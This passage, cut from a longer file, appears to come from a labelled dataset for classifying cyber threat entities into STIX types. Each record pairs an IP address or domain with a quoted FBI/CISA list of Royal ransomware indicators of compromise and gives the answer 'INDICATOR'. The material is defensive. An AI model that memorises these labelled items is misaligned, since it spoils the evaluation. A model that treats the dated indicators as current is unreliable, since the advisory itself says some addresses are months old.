malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n185.143.223.69\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nsombrat.com\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n113.169.187.159\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n185.7.214.218\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n190.193.180.228\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n139.60.161.213\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n197.11.134.255\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
